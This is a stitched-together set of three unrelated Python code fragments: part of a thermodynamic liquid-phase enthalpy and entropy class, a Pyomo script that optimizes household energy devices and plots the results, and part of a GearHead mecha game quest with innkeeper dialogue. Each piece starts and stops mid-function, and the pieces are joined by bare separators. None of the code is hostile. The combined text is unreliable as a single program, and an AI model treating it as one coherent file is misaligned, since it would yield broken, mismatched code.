except AttributeError:
pass
T = self.T
nRT2 = -R*T*T
zs, cmps = self.zs, self.cmps
try:
Cpig_integrals_pure = self._Cpig_integrals_pure
except AttributeError:
Cpig_integrals_pure = self.Cpig_integrals_pure()
# try:
# Psats = self._Psats
# except AttributeError:
# Psats = self.Psats()
# try:
# dPsats_dT = self._dPsats_dT
# except AttributeError:
# dPsats_dT = self.dPsats_dT()
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
use_Poynting, use_phis_sat = self.use_Poynting, self.use_phis_sat
if use_Poynting:
try:
Poyntings = self._Poyntings
except AttributeError:
Poyntings = self.Poyntings()
try:
dPoyntings_dT = self._dPoyntings_dT
except AttributeError:
dPoyntings_dT = self.dPoyntings_dT()
if use_phis_sat:
try:
dphis_sat_dT = self._dphis_sat_dT
except AttributeError:
dphis_sat_dT = self.dphis_sat_dT()
try:
phis_sat = self._phis_sat
except AttributeError:
phis_sat = self.phis_sat()
H = 0.0
if use_Poynting and use_phis_sat:
for i in cmps:
H += zs[i]*(nRT2*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ Cpig_integrals_pure[i])
elif use_Poynting:
for i in cmps:
H += zs[i]*(nRT2*(dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i]) + Cpig_integrals_pure[i])
elif use_phis_sat:
for i in cmps:
H += zs[i]*(nRT2*(dPsats_dT_over_Psats[i] + dphis_sat_dT[i]/phis_sat[i]) + Cpig_integrals_pure[i])
else:
for i in cmps:
H += zs[i]*(nRT2*dPsats_dT_over_Psats[i] + Cpig_integrals_pure[i])
if not self.composition_independent:
H += self.GibbsExcessModel.HE()
self._H = H
return H
def S_old(self):
# try:
# return self._S
# except AttributeError:
# pass
# Untested
# Page 650 Chemical Thermodynamics for Process Simulation
'''
from scipy.integrate import *
from CoolProp.CoolProp import PropsSI
fluid = 'decane'
T = 400
Psat = PropsSI('P', 'T', T, 'Q', 0, fluid)
P2 = Psat*100
dP = P2 - Psat
Vm = 1/PropsSI('DMOLAR', 'T', T, 'Q', 0, fluid)
Vm2 = 1/PropsSI('DMOLAR', 'T', T, 'P', P2, fluid)
dH = PropsSI('HMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('HMOLAR', 'T', T, 'Q', 0, fluid)
dS = PropsSI('SMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('SMOLAR', 'T', T, 'Q', 0, fluid)
def to_int2(P):
Vm = 1/PropsSI('DMOLAR', 'T', T, 'P', P, fluid)
alpha = PropsSI('ISOBARIC_EXPANSION_COEFFICIENT', 'T', T, 'P', P, fluid)
return -alpha*Vm
quad(to_int2, Psat, P2, epsabs=1.49e-14, epsrel=1.49e-14)[0]/dS
'''
S = 0.0
T, P, zs, cmps = self.T, self.P, self.zs, self.cmps
log_zs = self.log_zs()
for i in cmps:
S -= zs[i]*log_zs[i]
S *= R
S_base = S
T_inv = 1.0/T
RT = R*T
P_REF_IG_INV = self.P_REF_IG_INV
try:
Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
except AttributeError:
Cpig_integrals_over_T_pure = self.Cpig_integrals_over_T_pure()
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
try:
dPsats_dT = self._dPsats_dT
except AttributeError:
dPsats_dT = self.dPsats_dT()
try:
Vms_sat = self._Vms_sat
except AttributeError:
Vms_sat = self.Vms_sat()
try:
dVms_sat_dT = self._Vms_sat_dT
except AttributeError:
dVms_sat_dT = self.dVms_sat_dT()
if self.P_DEPENDENT_H_LIQ:
if self.use_IG_Cp:
failed_dPsat_dT = False
try:
for i in self.cmps:
dSi = Cpig_integrals_over_T_pure[i]
dVsat = R*T/Psats[i] - Vms_sat[i]
dSvap = dPsats_dT[i]*dVsat
# dSvap = Hvaps[i]/T # Confirmed - this line breaks everything - do not use
dSi -= dSvap
# dSi = Cpig_integrals_over_T_pure[i] - Hvaps[i]*T_inv # Do the transition at the temperature of the liquid
# Take each component to its reference state change - saturation pressure
# dSi -= R*log(P*P_REF_IG_INV)
dSi -= R*log(Psats[i]*P_REF_IG_INV)
# dSi -= R*log(P/101325.0)
# Only include the
dP = P - Psats[i]
# dP = max(0.0, P - Psats[i])
# if dP > 0.0:
# I believe should include effect of pressure on all components, regardless of phase
dSi -= dP*dVms_sat_dT[i]
S += dSi*zs[i]
except (ZeroDivisionError, ValueError):
# Handle the zero division on Psat or the log getting two small
failed_dPsat_dT = True
if failed_dPsat_dT or isinf(S):
S = S_base
# Handle the case where vapor pressure reaches zero - needs special implementations
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
lnPsats = self.lnPsats()
LOG_P_REF_IG = self.LOG_P_REF_IG
for i in cmps:
dSi = Cpig_integrals_over_T_pure[i]
dSvap = RT*dPsats_dT_over_Psats[i]
dSi -= dSvap
dSi -= R*(lnPsats[i] - LOG_P_REF_IG)# trunc_log(Psats[i]*P_REF_IG_INV)
dSi -= P*dVms_sat_dT[i]
S += dSi*zs[i]
if self.use_Tait:
pass
elif self.use_Poynting:
pass
# for i in cmps:
else:
# mine
Hvaps_T_ref = self.Hvaps_T_ref()
Psats_T_ref = self.Psats_T_ref()
Cpl_integrals_over_T_pure = self._Cpl_integrals_over_T_pure()
T_REF_IG_INV = self.T_REF_IG_INV
dVms_sat_dT_T_ref = self.dVms_sat_dT_T_ref()
Vms_sat_T_ref = self.Vms_sat_T_ref()
for i in self.cmps:
dSi = Cpl_integrals_over_T_pure[i]
dSi -= Hvaps_T_ref[i]*T_REF_IG_INV
# Take each component to its reference state change - saturation pressure
dSi -= R*log(Psats_T_ref[i]*P_REF_IG_INV)
# I believe should include effect of pressure on all components, regardless of phase
dP = P - Psats_T_ref[i]
dSi -= dP*dVms_sat_dT_T_ref[i]
S += dSi*zs[i]
# else:
# # COCO
# Hvaps = self.Hvaps()
# Psats_T_ref = self.Psats_T_ref()
# _Cpl_integrals_over_T_pure = self._Cpl_integrals_over_T_pure()
# T_REF_IG_INV = self.T_REF_IG_INV
#
# for i in self.cmps:
# dSi = -_Cpl_integrals_over_T_pure[i]
# dSi -= Hvaps[i]/T
# # Take each component to its reference state change - saturation pressure
# dSi -= R*log(Psats[i]*P_REF_IG_INV)
#
# dP = P - Psats[i]
# # I believe should include effect of pressure on all components, regardless of phase
# dSi -= dP*dVms_sat_dT[i]
# S += dSi*zs[i]
else:
Hvaps = self.Hvaps()
for i in cmps:
Sg298_to_T = Cpig_integrals_over_T_pure[i]
Svap = -Hvaps[i]*T_inv # Do the transition at the temperature of the liquid
S += zs[i]*(Sg298_to_T + Svap - R*log(P*P_REF_IG_INV)) #
# self._S =
S = S + self.GibbsExcessModel.SE()
return S
def S(self):
try:
return self._S
except AttributeError:
pass
T, P = self.T, self.P
P_inv = 1.0/P
zs, cmps = self.zs, self.cmps
log_zs = self.log_zs()
S = 0.0
for i in cmps:
S -= zs[i]*log_zs[i]
S -= log(P*self.P_REF_IG_INV)
S *= R
try:
Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
except AttributeError:
Cpig_integrals_over_T_pure = self.Cpig_integrals_over_T_pure()
try:
lnPsats = self._lnPsats
except AttributeError:
lnPsats = self.lnPsats()
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
use_Poynting, use_phis_sat = self.use_Poynting, self.use_phis_sat
if use_Poynting:
try:
Poyntings = self._Poyntings
except AttributeError:
Poyntings = self.Poyntings()
try:
dPoyntings_dT = self._dPoyntings_dT
except AttributeError:
dPoyntings_dT = self.dPoyntings_dT()
if use_phis_sat:
try:
dphis_sat_dT = self._dphis_sat_dT
except AttributeError:
dphis_sat_dT = self.dphis_sat_dT()
try:
phis_sat = self._phis_sat
except AttributeError:
phis_sat = self.phis_sat()
if use_Poynting and use_phis_sat:
for i in cmps:
S -= zs[i]*(R*(T*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ lnPsats[i] + log(Poyntings[i]*phis_sat[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
elif use_Poynting:
for i in cmps:
S -= zs[i]*(R*(T*(dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ lnPsats[i] + log(Poyntings[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
elif use_phis_sat:
for i in cmps:
S -= zs[i]*(R*(T*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i])
+ lnPsats[i] + log(phis_sat[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
else:
logP_inv = log(P_inv)
for i in cmps:
S -= zs[i]*(R*(T*dPsats_dT_over_Psats[i] + lnPsats[i] + logP_inv)
- Cpig_integrals_over_T_pure[i])
if not self.composition_independent:
S += self.GibbsExcessModel.SE()
self._S = S
return S
def Cp_old(self):
try:
return self._Cp
except AttributeError:
pass
# Needs testing
T, P, P_DEPENDENT_H_LIQ | |
<filename>ems/optim/opt_test.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
optimization for unit commitment of the household devices.
@author: ge57vam
"""
import sys
import pyomo.core as pyen
# import pyomo.environ
# from pyomo.core import *
from pyomo.opt import SolverFactory
from pyomo.opt import SolverManagerFactory
import pandas as pd
import numpy as np
import pyomo.core as py
import os
from scipy.interpolate import UnivariateSpline
import time as tm
from pyomo.environ import *
import matplotlib.pyplot as plt
import scipy.io
from ems.ems_mod import ems as ems_loc
def run_hp_opt(ems_local, plot_fig=True, result_folder='C:'):
# input_file = 'C:\Optimierung\Eingangsdaten_hp.xlsx'
# data = read_xlsdata(input_file);
prob, timesteps = run_hp(ems_local)
length = len(timesteps)
print('Load Results ...\n')
# electricity variable
HP_ele_cap, HP_ele_run, elec_import, elec_export, lastprofil_elec, ev_pow, CHP_cap, pv_power, bat_cont, bat_power, bat_power_pos, bat_power_neg = \
(np.zeros(length) for i in range(12));
# heat variable
boiler_cap, CHP_heat_cap, HP_heat_run, HP_heat_cap, CHP_op, HP_operation, lastprofil_heat, sto_e_pow, sto_e_pow_pos, sto_e_pow_neg, sto_e_cont = \
(np.zeros(length) for i in range(11));
# final cost
cost_min = np.zeros(length)
# heat balance
bat_max_cont = value(prob.bat_cont_max)
sto_cont_max = value(prob.sto_cont)
bat_cont_init = bat_max_cont * 0.5
sto_cont_init = sto_cont_max * 0.5
i = 0
# timesteps = sorted(get_entity(prob, 't').index)
# demand, ext, pro, sto = get_timeseries(prob, timesteps
for idx in timesteps:
# electricity balance
ev_pow[i] = value(prob.ev_power[idx]) * value(prob.ev_max_pow);
elec_import[i] = value(prob.elec_import[idx]);
elec_export[i] = value(prob.elec_export[idx]);
lastprofil_elec[i] = value(prob.lastprofil_elec[idx]);
CHP_op[i] = value(prob.CHP_cap[idx]);
CHP_cap[i] = value(prob.CHP_cap[idx] * prob.chp_elec_max_cap);
pv_power[i] = value(prob.PV_cap[idx] * prob.pv_effic * prob.solar[idx]);
bat_cont[i] = value(prob.bat_cont[idx]);
bat_power[i] = value(prob.bat_pow[idx]);
##heat balance
boiler_cap[i] = value(prob.boiler_cap[idx]);
CHP_heat_cap[i] = value(prob.CHP_cap[idx] * prob.chp_elec_max_cap / prob.chp_elec_effic * prob.chp_ther_effic);
HP_operation[i] = value(prob.hp_run[idx] * prob.sto_max_cont) / value(prob.sto_max_cont)
HP_heat_cap[i] = value(prob.hp_run[idx] * prob.hp_ther_pow[idx])
HP_ele_cap[i] = value(prob.hp_run[idx] * prob.hp_ele_pow[idx])
HP_heat_run[i] = value(prob.hp_ther_pow[idx])
HP_ele_run[i] = value(prob.hp_ele_pow[idx])
lastprofil_heat[i] = value(prob.lastprofil_heat[idx]);
sto_e_pow[i] = value(prob.sto_e_pow[idx]);
sto_e_cont[i] = value(prob.sto_e_cont[idx]);
# the total cost
cost_min[i] = value(prob.costs[idx]);
i += 1;
SOC_heat = sto_e_cont / sto_cont_max * 100;
SOC_elec = bat_cont / bat_max_cont * 100;
# battery_power
for i in range(length):
if bat_power[i] > 0:
bat_power_neg[i] = -bat_power[i];
else:
bat_power_pos[i] = -bat_power[i];
# heat storage power
for i in range(length):
if sto_e_pow[i] > 0:
sto_e_pow_neg[i] = -sto_e_pow[i];
else:
sto_e_pow_pos[i] = -sto_e_pow[i];
# plt.plot(c)
# plt.plot(a)
# plt.plot(b)
# plt.plot(d)
### plot elec balance
N = len(timesteps)
ind = np.arange(N) # the x locations for the groups
width = 1 # the width of the bars: can also be len(x) sequence
print('Results Loaded.')
# plt.clf()
COLOURS = {
0: 'lightsteelblue',
1: 'cornflowerblue',
2: 'royalblue',
3: 'lightgreen',
4: 'salmon',
5: 'mediumseagreen',
6: 'orchid',
7: 'burlywood',
8: 'palegoldenrod',
9: 'darkkhaki',
10: 'lightskyblue',
11: 'firebrick',
12: 'blue',
13: 'darkgreen'}
if plot_fig is True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
p1 = plt.bar(ind, CHP_cap, width, bottom=bat_power_pos, color='skyblue')
ax1.axhline(linewidth=2, color="black")
p2 = plt.bar(ind, pv_power, width,
bottom=bat_power_pos + CHP_cap, color='wheat')
p3 = plt.bar(ind, bat_power_pos, width, color='#ff5a60')
p4 = plt.bar(ind, bat_power_neg, width, color='#ff5a60')
p5 = plt.bar(ind, elec_import, width, bottom=bat_power_pos + CHP_cap + pv_power, color='#689eb8')
p6 = plt.bar(ind, -elec_export, width, bottom=bat_power_neg, color='black')
# p7 = plt.plot(ind, lastprofil_elec,linewidth=3,color='k')
p7 = plt.step(ind, lastprofil_elec, linewidth=2, where='mid', color='k')
p8 = plt.bar(ind, -ev_pow, width, bottom=bat_power_neg - elec_export, color='pink')
p9 = plt.bar(ind, -HP_ele_cap, width, bottom=bat_power_neg - elec_export - ev_pow, color='#a79b94')
plt.xlabel('time [h]', fontsize=25)
plt.ylabel('power und ele. demand [kW]', fontsize=25)
plt.title('electricity balance', fontsize=30)
idx_plt = np.arange(0, len(timesteps), int(len(timesteps) / 5))
plt.xticks(ind[idx_plt], timesteps[idx_plt])
ax1.set_xlim(0, len(timesteps) - 1)
# plt.yticks(np.arange(-10, 10, 2))
plt.legend((p1[0], p2[0], p3[0], p5[0], p6[0], p7[0], p8[0], p9[0]),
('CHP', 'PV', 'battery', 'import', 'export', 'ele. demand', 'EV charge', 'HP'), prop={'size': 20},
loc='lower left')
fig1 = plt.figure()
ax2 = plt.subplot()
# p8 = plt.plot(ind, bat_cont/bat_max_cont*100,linewidth=1,color='red')
p8 = plt.step(ind, SOC_elec, linewidth=1, color='red', where='mid')
plt.xlabel('time [h]', fontsize=25)
plt.ylabel('SOC [%]', fontsize=25)
plt.title('SOC of Battery', fontsize=30)
plt.xticks(ind[idx_plt], timesteps[idx_plt])
ax2.set_xlim(0, len(timesteps) - 1)
plt.show()
# plot heat balance
if plot_fig is True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.axhline(linewidth=2, color="black")
p1 = plt.bar(ind, boiler_cap, width, bottom=sto_e_pow_pos, color='#689eb8')
p2 = plt.bar(ind, CHP_heat_cap, width,
bottom=boiler_cap + sto_e_pow_pos, color='skyblue')
p3 = plt.bar(ind, HP_heat_cap, width, bottom=boiler_cap + CHP_heat_cap + sto_e_pow_pos, color='#a79b94')
p4 = plt.bar(ind, sto_e_pow_pos, width, color='#ff5a60')
p5 = plt.bar(ind, sto_e_pow_neg, width, color='#ff5a60')
p6 = plt.step(ind, lastprofil_heat, linewidth=2, where='mid', color='k')
plt.xlabel('time [1/4 h]', fontsize=25)
plt.ylabel('power and heat load [kW]', fontsize=25)
plt.title('heat balance', fontsize=30)
plt.xticks([0, 24, 2, 2], fontsize=30)
plt.yticks(fontsize=30)
idx_plt = np.arange(0, len(timesteps), int(len(timesteps) / 5))
plt.xticks(ind[idx_plt], timesteps[idx_plt])
ax1.set_xlim(0, len(timesteps) - 1)
# plt.yticks(np.arange(-10, 10, 2))
plt.legend((p1[0], p2[0], p3[0], p4[0], p6[0]), ('boiler', 'CHP', 'HP', 'heat storage', 'heat demand'),
prop={'size': 20}, loc='lower left')
fig1 = plt.figure()
ax2 = plt.subplot()
p7 = plt.step(ind, SOC_heat, linewidth=1, where='mid', color='red')
plt.xlabel('time [h]', fontsize=25)
plt.ylabel('SOC [%]', fontsize=25)
plt.xticks(ind[idx_plt], timesteps[idx_plt])
ax2.set_xlim(0, len(timesteps) - 1)
plt.title('SOC of heat storage', fontsize=30)
plt.show()
# save the data
from datetime import datetime
print('Save Results to Reportfile...\n')
# xx ="\\nas.ads.mwn.de\ge57vam\TUM-PC\Desktop\Unterlagen\result"
# Create Name of Resultfile
t0 = tm.time()
# inputfilename = input_file
now = datetime.now().strftime('%Y%m%dT%H%M')
resultfile = os.path.join(result_folder, 'result-{}.xlsx'.format(now))
writer = pd.ExcelWriter(resultfile)
data_input = {'HP_operation': list(HP_operation), 'HP_heat_power': list(HP_heat_cap),
'HP_heat_run': list(HP_heat_run),
'HP_ele_run': list(HP_ele_run), 'CHP_operation': list(CHP_op), 'SOC_heat': list(SOC_heat),
'SOC_elec': list(SOC_elec),
'battery_SOC': list(bat_cont / bat_max_cont * 100), 'battery_power': list(bat_power),
'PV_power': list(pv_power),
'EV_power': list(ev_pow), 'min cost': list(cost_min)}
df = pd.DataFrame(data=data_input)
df.to_excel(writer, 'operation_plan', merge_cells=False)
scipy.io.savemat('C:\Optimierung\AAAAA.mat', {'struct1': df.to_dict("list")})
writer.save() # save
print('Results Saved. time: ' + "{:.1f}".format(tm.time() - t0) + ' s\n')
return data_input
def run_hp(ems_local):
# record the time
t0 = tm.time()
# get all the data from the external file
# my_ems1 = ems_loc(initialize=True, path='C:/Users/ge57vam/emsflex/ems/ems01_ems.txt')
my_ems1 = ems_local
devices = my_ems1['devices']
# read data from excel file
print('Data Read. time: ' + "{:.1f}".format(tm.time() - t0) + ' s\n')
print('Prepare Data ...\n')
t = tm.time()
# write in the time series from the data
df_time_series = ems_local['fcst']
time_series = pd.DataFrame.from_dict(df_time_series)
# time = time_series.index.values
print('Data Prepared. time: ' + "{:.1f}".format(tm.time() - t) + ' s\n')
# lastprofil =data['Lastprofil']
# source_import =data['import']
# source_export =data['export']
# system
# get the initial time step
#time_step_initial = parameter.loc['System']['value']
time_step_initial = 0
timesteps_all = np.arange(1, 96)
# timestep_1 = timesteps[0]
timesteps = timesteps_all[time_step_initial:96]
t_dn = 6
t_up = 6
timesteps_dn = timesteps[time_step_initial+1:96 - t_dn]
timesteps_up = timesteps[time_step_initial+1:96 - t_up]
# 15 min for every timestep/ timestep by one hour
# create the concrete model
p2e = 0.25
# create the model object m
m = pyen.ConcreteModel()
# heat storage
sto_param = devices['sto']
# storage_cap = sto_param['stocap']
tem_min_sto = sto_param['mintemp']
tem_max_sto = sto_param['maxtemp']
soc_init = sto_param['initSOC']
self_discharge = sto_param['self_discharge']
# unit in kWh
sto_cont = sto_param['stocap']
# boiler
boil_param = devices['boiler']
boil_cap = boil_param['maxpow']
boil_eff = boil_param['eta']
# EV, availability should be added
ev_param = devices['ev']
ev_max_power = ev_param['maxpow']
# CHP
chp_param = devices['chp']
chp_elec_eff = chp_param['eta'][0]
chp_ther_eff = chp_param['eta'][1]
chp_elec_cap = chp_param['maxpow']
# heat pump
hp_param = devices['hp']
hp_ther_cap = pd.DataFrame.from_dict(hp_param['maxpow'])
hp_cop = pd.DataFrame.from_dict(hp_param['COP'])
# PV
pv_param = devices['pv']
pv_peak_pow = pv_param['maxpow']
pv_eff = pv_param['eta']
# battery
bat_param = devices['bat']
bat_max_cont = bat_param['stocap']
bat_SOC_init = bat_param['initSOC']
bat_pow_max = bat_param['maxpow']
## create the parameter
print('Define Model ...\n')
#
m.t = pyen.Set(ordered=True, initialize=timesteps,
doc='Timesteps with zero')
# m.t_end = pyen.Set(initialize=timesteps,
# doc='Timesteps without zero')
m.t_DN = pyen.Set(ordered=True, initialize=timesteps_dn,
doc='Timesteps without zero')
m.t_UP = pyen.Set(ordered=True, initialize=timesteps_up,
doc='Timesteps without zero')
# heat_storage
m.sto_max_cont = pyen.Param(initialize=sto_cont,
doc='No Partload: offset is zero')
m.SOC_init = pyen.Param(initialize=soc_init,
doc='No Partload: offset is zero')
# battery
m.bat_cont_max = pyen.Param(initialize=bat_max_cont)
m.bat_SOC_init = pyen.Param(initialize=bat_SOC_init)
m.bat_power_max = pyen.Param(initialize=bat_pow_max)
# hp
m.hp_ther_pow = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.sto_cont = pyen.Param(initialize=sto_cont,
doc='No Partload: offset is zero')
m.hp_COP = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.hp_ele_pow = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.T_DN = pyen.Param(initialize=t_dn, mutable=True,
doc='No Partload: offset is zero')
m.T_UP = pyen.Param(initialize=t_up, mutable=True,
doc='No Partload: offset is zero')
# elec_vehicle
m.ev_max_pow = pyen.Param(initialize=ev_max_power,
doc='No Partload: offset is zero')
# boilder
m.boiler_max_cap = pyen.Param(initialize=boil_cap,
doc='No Partload: offset is zero')
m.boiler_eff = pyen.Param(initialize=boil_eff,
doc='No Partload: offset is zero')
# chp
m.chp_elec_effic = pyen.Param(initialize=chp_elec_eff,
doc='chp ele. efficiency')
m.chp_ther_effic = pyen.Param(initialize=chp_ther_eff,
doc='No Partload: offset is zero')
m.chp_elec_max_cap = pyen.Param(initialize=chp_elec_cap,
doc='No Partload: offset is zero')
# solar
m.pv_effic = pyen.Param(initialize=pv_eff,
doc='No Partload: offset is zero')
m.pv_peak_power = pyen.Param(initialize=pv_peak_pow,
doc='No Partload: offset is zero')
m.solar = pyen.Param(m.t, initialize=1, mutable=True,
doc='No Partload: offset is zero')
# for t in m.t_UP:
# m.t_dn[t] = t_dn
# m.t_up[t] = t_dn
# | |
of a companion. This mecha packs some heavy firepower and an electronic warfare system."))
museum.contents.append(ghwaypoints.GladiusModel(desc="Since NT152, the Gladius mecha has been awarded to the winner of Snake Lake City's annual Robot Warriors competition. This makes it one of the rarest mecha in the world since only five of them have been constructed so far. The Gladius is based on a Savin frame, but has been heavily modified by the Ran Magnus workshop."))
museum.contents.append(ghwaypoints.GoldPlaque(desc="This plaque confirms that the BRONZE HORSE INN has been designated an official CAVALIER CLUB by the PRO DUELIST ASSOCIATION."))
museum.contents.append(ghwaypoints.VadelModel(desc="For sixty years the Vadel has been Earth's foremost high end sports battroid. Designed and built right here in Wujung, this mecha combines unsurpassed speed with a versatile array of powerful weapons."))
museum.contents.append(ghwaypoints.HarpyModel(desc="The Harpy transatmospheric fighter is a hybrid aerobatroid used by the Solar Navy. This is one nasty piece of work. Its heavy missiles can take down an entire lance at once, then it swoops in and picks off the survivors with twin laser cannons. Avoid avoid avoid. Unless you're the one piloting it, in which case enjoy."))
museum.contents.append(ghwaypoints.ClaymoreModel(desc="The Claymore holds the distinction of being the oldest mecha design still in production. It may be heavy and slow, but it is also well armored and usually loaded with enough firepower to raze a small city."))
self.team3 = self.register_element("MUSEUM_TEAM", teams.Team(name="Museum Team"))
museum.contents.append(self.team3)
# Add the elevator to the guest rooms- this can be used by subplots to also visit lancemate rooms and other stuff.
osmund = gears.base.Character(name="Osmund", statline={gears.stats.Reflexes: 17,
gears.stats.Body: 16, gears.stats.Speed: 14,
gears.stats.Perception: 13,
gears.stats.Knowledge: 13, gears.stats.Craft: 7,
gears.stats.Ego: 9,
gears.stats.Charm: 15, gears.stats.MechaPiloting: 7,
gears.stats.MechaGunnery: 7,
gears.stats.MechaFighting: 7,
gears.stats.Negotiation: 8}, birth_year=102,
portrait='card_m_osmund.png',
personality=[personality.Sociable, personality.Passionate, personality.Fellowship,
personality.DeadZone],
colors=(gears.color.Straw, gears.color.TannedSkin, gears.color.PlasmaBlue,
gears.color.Gold, gears.color.AceScarlet),
gender=gears.genderobj.Gender.get_default_male(),
job=gears.jobs.ALL_JOBS["Innkeeper"], renown=65, combatant=True)
team2.contents.append(osmund)
self.register_element("INNKEEPER", osmund)
self.did_intro = False
self.told_about_services = False
self.gave_mission = False
self.opened_gym = False
self.training = services.SkillTrainer((gears.stats.Vitality, gears.stats.Concentration, gears.stats.Athletics,
gears.stats.Dodge, gears.stats.CloseCombat, gears.stats.RangedCombat))
self.mission_seed = missionbuilder.BuildAMissionSeed(
nart.camp,"Help Osmund's Friend",self.elements["METROSCENE"],self.elements["MISSION_GATE"],
objectives=(missionbuilder.BAMO_CAPTURE_THE_MINE,missionbuilder.BAMO_NEUTRALIZE_ALL_DRONES),cash_reward=500,
architecture = gharchitecture.MechaScaleSemiDeadzone(),
enemy_faction=plotutility.RandomBanditCircle(nart.camp),
win_message = "You have liberated the mining camp from the bandits who stole it.",
one_chance = False, on_win=self._win_mine_mission
)
self.osmund_info = (
OneShotInfoBlast("cavaliers",
"Freelance mecha pilots. Some people prefer the term mercenaries, or adventurers. Cavalier is what I used to call myself back when I was doing that sort of work."),
OneShotInfoBlast("the Bronze Horse",
"In PreZero times, around this area, a bronze medallion with a horse on it was the symbol of a special agent. These agents were heroes of the common people; they'd go around fixing problems and punishing the slagheads who abused their power. Kind of like cavaliers do today."),
OneShotInfoBlast("lancemates",
"You won't get very far around here if you try running off by yourself; you'll get even less far if you head out into the dead zone. Try talking to some of the pilots here and see if you can get them to join you. Come back and see me when you get three lancemates and I may have some work for you."),
OneShotInfoBlast("the dead zone",
"Well, the dead zone is kind of a funny name, because really it's a whole lot of different places. All that area to the west of here, where life hasn't really recovered since the Night of Fire. Of course that doesn't mean there's nobody there. I'm from the dead zone myself, originally."),
OneShotInfoBlast("the Night of Fire",
"You didn't pay much attention in school, did you? The nuclear war that ended the Age of Superpowers and created the world as we knows it now. They say that two thirds of everybody alive was dead in a week."),
)
# Create the athlete.
self.register_element("TRAINER", gears.selector.random_character(35, camp=nart.camp, job=gears.jobs.ALL_JOBS["Athlete"]))
self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
#self.add_sub_plot(nart, "DZD_BHIRandomLancemate")
return True
def _do_intro(self, camp):
self.did_intro = True
def _tell_about_services(self, camp):
self.told_about_services = True
def INNKEEPER_offers(self, camp: gears.GearHeadCampaign):
mylist = list()
if self.did_intro:
mylist.append(Offer("[HELLO] [_BRONZE_HORSE_SPIEL]",
context=ContextTag([context.HELLO]),
))
else:
mylist.append(Offer(
"[HELLO] I am the owner of the Bronze Horse Inn; our facilities were designed especially for cavaliers. If you need a place to stay or just want to pick up some lancemates you've come to the right place.",
context=ContextTag([context.HELLO]), effect=self._do_intro
))
if not self.told_about_services:
mylist.append(Offer("While you rest in one of our suites, your mecha will be taken care of in our offsite hangar with full repair and customization services. We have a physical training room, a mecha museum, and a twenty four hour breakfast buffet. It's everything a cavalier could want.",
context=ContextTag([context.INFO]), effect=self._tell_about_services,
data={"subject": "your services"}, no_repeats=True,
))
if self.did_intro and not self.gave_mission and len(camp.get_lancemates()) >= 3:
mylist.append(Offer("[HELLO] You know, A friend of mine has a problem that you might be able to help with...",
context=ContextTag([context.HELLO]),
))
mylist.append(
Offer("A buddy of mine from back home set up a robotic mining operation just outside of Last Hope. Unfortunately, as soon as she started hitting the good stuff, a gang of bandits rolled in and took over the site for themselves. What I'd like you to do is go clear 'em out.",
context=ContextTag([context.MISSION]),subject=self,subject_start=True
))
mylist.append(
Offer(
"Fantastic. You can access the mission by heading to the West Gate of Wujung and following the nav coordinates I'm sending to you now. [GOODLUCK]",
context=ContextTag([context.ACCEPT]), subject=self, effect=self._accept_mission
))
mylist.append(
Offer(
"[UNDERSTOOD] You're going to want to keep your eyes open for mission offers, though, since they're the main way for cavaliers to earn money.",
context=ContextTag([context.DENY]), subject=self, effect=self._deny_mission
))
for inf in self.osmund_info:
if inf.active:
mylist.append(inf.build_offer())
if camp.campdata.get("CD_SPOKE_TO_RAN", None) and not self.opened_gym:
#if not self.opened_gym:
mylist.append(
Offer(
"Oh yeah, Ran and I go way back. We were lancemates back in the twenties. She's a good person to know if you're a cavalier.\n I'll tell you another good person to know- the hotel's personal trainer {TRAINER}. You can probably find {TRAINER.gender.object_pronoun} in the museum.".format(**self.elements),
context=ContextTag([context.CUSTOM]), data={"reply": "You didn't tell us that the mission you gave was for Ran Magnus!"}, effect=self._open_gym
))
#ghdialogue.TagBasedPartyReply(
# Offer(
# "Ran and I used to be in the same lance. Of course that was years before she set up her mecha factory, and I eventually set up this hotel...",
# context=ContextTag([context.INFO]),data={"subject": "Ran Magnus"}, no_repeats=True,
# ), camp, mylist, [gears.tags.Academic]
#)
return mylist
def _open_gym(self, camp):
self.opened_gym = True
my_scene: gears.GearHeadScene = self.elements["INTERIOR"]
my_scene.deploy_team([self.elements["TRAINER"]], self.team3)
def _accept_mission(self,camp):
missionbuilder.NewMissionNotification(self.mission_seed.name,self.elements["MISSION_GATE"])
self.gave_mission = True
def _deny_mission(self,camp):
self.gave_mission = True
self.mission_seed = None
def MISSION_GATE_menu(self, camp, thingmenu):
if self.mission_seed and self.gave_mission:
thingmenu.add_item(self.mission_seed.name, self.mission_seed)
def _win_mine_mission(self, camp: gears.GearHeadCampaign):
camp.campdata["MINE_MISSION_WON"] = True
def t_UPDATE(self, camp):
# If the adventure has ended, get rid of it.
if self.mission_seed and self.mission_seed.ended:
self.mission_seed = None
def _get_dialogue_grammar(self, npc, camp):
mygram = dict()
if camp.scene.get_root_scene() is self.elements["LOCALE"]:
# This is an NPC in Wujung. Give them some news.
mygram["[_BRONZE_HORSE_SPIEL]"] = [
